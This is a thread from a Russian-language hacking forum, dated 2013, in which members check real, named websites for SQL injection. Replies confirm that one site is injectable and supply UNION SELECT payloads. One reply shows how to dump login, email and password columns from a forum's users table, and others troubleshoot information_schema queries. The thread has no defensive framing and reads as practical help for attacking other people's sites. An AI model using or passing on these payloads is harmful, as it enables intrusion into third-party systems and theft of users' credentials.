12.01.2013, 13:19
|
|
Новичок
Регистрация: 11.04.2012
Сообщений: 2
С нами:
7414166
Репутация:
0
|
|
OxoTnik, спасибо, с темой уяснил.
|
|
|
03.03.2013, 18:54
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
С нами:
8772921
Репутация:
1
|
|
Есть ли тут скуля ?
http://propelarizona.com/member/278
http://propelarizona.com/member/173/50
|
|
|
|
03.03.2013, 19:04
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от pharm_all
Есть ли тут скуля ?
http://propelarizona.com/member/278
http://propelarizona.com/member/173/50
Скуля есть, для простоты инъекций используй url http://propelarizona.com/member/ 173/blog_id=50
|
|
|
|
04.03.2013, 02:43
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
С нами:
8772921
Репутация:
1
|
|
Сообщение от OxoTnik
Скуля есть, для простоты инъекций используй url http://propelarizona.com/member/
173/blog_id=50
Не могу понять, там 3 версия мускула? Почему -то не выводит unionom 19 вроде полей.
|
|
|
|
19.03.2013, 06:26
|
|
Новичок
Регистрация: 29.01.2010
Сообщений: 0
С нами:
8569343
Репутация:
0
|
|
объясните плиз что такое подзапросы...
|
|
|
|
31.03.2013, 10:20
|
|
Новичок
Регистрация: 07.01.2013
Сообщений: 19
С нами:
7023926
Репутация:
5
|
|
Сообщение от None
И вот мы нашли поля login, password.
а что дальше, как их выбирать?
запрос
Код HTML:
?q=532&n=108316' and 1=0 union select 1,COLUMN_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS where table_name='aph_forum_users' --
Выводит
Id
Nik
Email
Pasw
|
|
|
|
31.03.2013, 11:06
|
|
Участник форума
Регистрация: 10.01.2013
Сообщений: 100
С нами:
7019606
Репутация:
27
|
|
Сообщение от LomasterII
а что дальше, как их выбирать?
запрос
Код HTML:
?q=532&n=108316' and 1=0 union select 1,COLUMN_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS where table_name='aph_forum_users' --
Выводит
Id
Nik
Email
Pasw Ну у Вас выводятся имена столбцов таблицы. Чтобы вывести значения этих столбцов, просто впишите в запрос имена и укажите с какой таблицы делать выборку. В Вашем случает примерно так...
?q=532&n=108316' and 1=0 union select 1,CONCAT_WS(0x3a,Id,Nik,Email,Pasw),3,4,5,6,7 FROM aph_forum_users --
|
|
|
|
08.10.2013, 00:12
|
|
Новичок
Регистрация: 08.09.2013
Сообщений: 1
С нами:
6672566
Репутация:
0
|
|
я вот непойму,
ну допустим есть уязвимый параметр id который попадает к примеру в такой запрос
SELECT `domain` FROM `mpm` where `id` ='2'
вот я например хочу вывести данные из информатион скхема
SELECT `domain` FROM `mpm` where `id` ='2' union select
`table_name` from information_schema.tables limit+0,1
почему в ответ пишет Unknown table 'mpm' in information_schema ???
(тестирую в phpmyadimn)
|
|
|
|
08.10.2013, 10:44
|
|
Постоянный
Регистрация: 03.08.2012
Сообщений: 371
С нами:
7250006
Репутация:
37
|
|
Сообщение от Jack-seo
я вот непойму,
ну допустим есть уязвимый параметр id который попадает к примеру в такой запрос
SELECT `domain` FROM `mpm` where `id` ='2'
вот я например хочу вывести данные из информатион скхема
SELECT `domain` FROM `mpm` where `id` ='2' union select
`table_name` from information_schema.tables limit+0,1
почему в ответ пишет Unknown table 'mpm' in information_schema ???
(тестирую в phpmyadimn)
SELECT `domain` FROM `mpm` where `id` ='2' AND 1=0 union select
`table_name` from information_schema.tables limit+0,1
|
|
|
|
08.10.2013, 11:13
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от \/IRUS
SELECT `domain` FROM `mpm` where `id` ='2' AND 1=0 union select
`table_name` from information_schema.tables limit+0,1
Произойдет такая же ошибка, так как, скорее всего, у него не выбрана база данных.
Сообщение от None
SELECT `domain` FROM `
DATABASE
`.`mpm` where `id` ='2' AND 1=0 union select `table_name` from information_schema.tables limit+0,1
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
